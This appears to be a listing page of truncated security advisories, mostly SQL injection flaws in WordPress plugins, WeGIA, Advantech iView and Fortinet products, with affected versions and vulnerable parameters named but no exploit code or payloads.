CVE-2025-7442

The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to SQL Injection via several parameters in the MJgmgtdeleteclasslimitformember, MJgmgtgetyearlyincomeexpense, MJgmgtgetmonthlyincomeexpense, MJgmgtaddclasslimit, MJgmgtviewmeetingdetail, and MJgmgtcreatemeeting functio...

PT-2025-29866 · Wegia · Wegia

Name of the Vulnerable Software and Affected Versions: WeGIA versions prior to 3.4.5 Description: WeGIA is an open-source web manager designed for Portuguese-language and charitable institutions. A SQL Injection issue exists in the /controle/control.php API endpoint, specifically through the carg...

CVE-2025-53509

Advantech iView contains an argument-injection vulnerability in NetworkServlet.restoreDatabase(), exploitable by an authenticated user with at least user-level privileges. An input parameter can be used directly in a command without sanitization, enabling arbitrary arguments and potentially leadi...

CVE-2025-52459

Advantech iView contains a vulnerability in the NetworkServlet.backupDatabase() function where certain parameters can be injected into commands due to improper sanitization. An authenticated attacker with user-level privileges could inject arbitrary arguments, potentially leading to information d...

CVE-2025-6970

The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the...

CVE-2025-34084

...

WordPress ads pro SQL Injection Vulnerability

WordPress Ads Pro is a multi-purpose ad management plugin, mainly used for flexible management of ad space in WordPress websites, supporting banner ad display, billing mode settings and user-friendly ad placement solutions. WordPress ads pro suffers from a SQL injection vulnerability, which stems...

PT-2025-28465 · Fortinet · Fortianalyzer Cloud +3

Name of the Vulnerable Software and Affected Versions: FortiManager versions 6.4 through 7.6.1 FortiManager Cloud versions 6.4 through 7.4.6 FortiAnalyzer versions 6.4 through 7.6.1 FortiAnalyzer Cloud versions 6.4 through 7.4.6 Description: The issue is related to an Improper Neutralization of...

CVE-2025-6783 GoZen Forms <= 1.1.5 - Unauthenticated SQL Injection via emdedSc()

The GoZen Forms plugin for WordPress is vulnerable to SQL Injection via the 'forms-id' parameter of the emdedSc function in all versions up to, and including, 1.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes...

CVE-2025-6739 WPQuiz <= 0.4.2 - Authenticated (Contributor+) SQL Injection

The WPQuiz plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'wpquiz' shortcode in all versions up to, and including, 0.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it...

PT-2025-27908 · Unknown · Simple Link Directory

Name of the Vulnerable Software and Affected Versions: Simple Link Directory versions n/a through 14.7.3 Description: The issue is related to an SQL Injection vulnerability, specifically an Improper Neutralization of Special Elements used in an SQL Command. This allows attackers to execute...

CVE-2025-5339 Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= 4.89 - Unauthenticated Time-Based SQL Injection via ‘bsa_pro_id'

The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘bsaproid’ parameter in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on...

PT-2025-27594 · WordPress · The Ads Pro Plugin

Name of the Vulnerable Software and Affected Versions: The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager versions up to, and including, 4.89 Description: The issue allows for SQL Injection via the oid parameter due to insufficient escaping on the user-supplied parameter and lack of...

CVE-2025-53091 WeGIA has Unauthenticated Time-Based Blind SQL Injection in almox Parameter

WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Time-Based Blind SQL Injection vulnerability was discovered in version 3.3.3 the almox parameter of the /controle/getProdutosPorAlmox.php endpoint. This issue allows any unauthenticated...

GHSA-JJ2R-455P-5GVF filebrowser Sets Insecure File Permissions

Summary The file access permissions for files uploaded to or created from File Browser are never explicitly set by the application. The same is true for the database used by File Browser. On standard servers where the umask configuration has not been hardened before, this makes all the stated fil...

filebrowser Sets Insecure File Permissions

Summary The file access permissions for files uploaded to or created from File Browser are never explicitly set by the application. The same is true for the database used by File Browser. On standard servers where the umask configuration has not been hardened before, this makes all the stated fil...

PT-2025-27101

Name of the Vulnerable Software and Affected Versions: ThemeMove Amely versions n/a through 3.1.4 Description: The issue is related to an SQL Injection vulnerability due to improper neutralization of special elements used in an SQL command. This allows for SQL Injection attacks. Recommendations:...

SQL Injection Vulnerability in ERP System of Shenzhen Mingyuan Cloud Technology Co.

The ERP system is a comprehensive information management platform that integrates the functions of housing, customers, sales, finance and human resources. ERP system of Shenzhen Mingyuan Cloud Technology Co., Ltd. suffers from SQL injection vulnerability, which can be exploited by attackers to...

PT-2025-26217

Name of the Vulnerable Software and Affected Versions Yirmibes Software MY ERP versions prior to 1.170 Description The issue is related to an SQL Injection vulnerability due to improper neutralization of special elements used in an SQL command. This allows for SQL Injection attacks. Recommendatio...

PT-2025-25676 · Unknown · Smart Notification

Name of the Vulnerable Software and Affected Versions: Smart Notification versions n/a through 10.3 Description: The issue is related to an SQL Injection vulnerability, specifically a Blind SQL Injection, due to the improper neutralization of special elements used in an SQL command. This allows a...